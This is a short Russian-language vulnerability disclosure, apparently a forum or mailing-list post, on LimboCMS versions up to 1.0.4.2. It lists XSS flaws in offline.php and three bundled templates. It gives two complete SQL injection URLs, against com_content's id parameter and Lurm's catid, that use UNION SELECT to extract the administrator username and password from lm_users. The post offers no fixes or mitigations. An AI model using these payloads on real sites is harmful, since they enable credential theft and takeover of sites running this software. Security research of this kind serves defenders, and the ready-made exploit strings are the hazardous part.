Множественные уязвимости в Limbo <=1.0.4.2

Множественные уязвимости в LimboCMS <=1.0.4.2 (в т.ч. <=1.0.4 RE 3)

1. Возможна sql-injection в компоненте com_content из за недостаточной фильтрации переменной id

пример
http://site/index.php?option=content&amp;task=view&amp;id=-1&#37;20union&#37;20select&#37;20concat&#40;char&#40;0x6c,0x6f,0x67,0x69,0x6e,0x3a&#41;,username,char&#40;0x20,0x70,0x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x3a&#41;,password&#41;&#37;20from&#37;20lm_users&#37;20where&#37;20id=1&amp;catid=4&amp;Itemid=62

2. Sql-inj в Lurm в переменной catid

http://test/index.php?option=lurm&amp;sec=content&amp;task=moreinfo&amp;catid=-1&#37;20union&#37;20select&#37;201,concat&#40;char&#40;0x6c,0x6f,0x67,0x69,0x6e,0x3a&#41;,username,char&#40;0x20,0x70,0x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x3a&#41;,password&#41;,3&#37;20from&#37;20lm_users&#37;20where&#37;20id=1&amp;id=1&amp;fld=usr_hits&amp;Itemid=51

3. XSS в файле /includes/offline.php в переменной lm_title

4 так же XSS подвержены 3 шаблона из поставки <=1.0.4 RE 3
sbtpl-02-green
247portal
sbtpl-02-blue

уязвима переменная mosConfig_live_site

HaZeR and CFteam icq 206693 www.cf-team.net

С уважением,
HaZeR mailto:[email protected]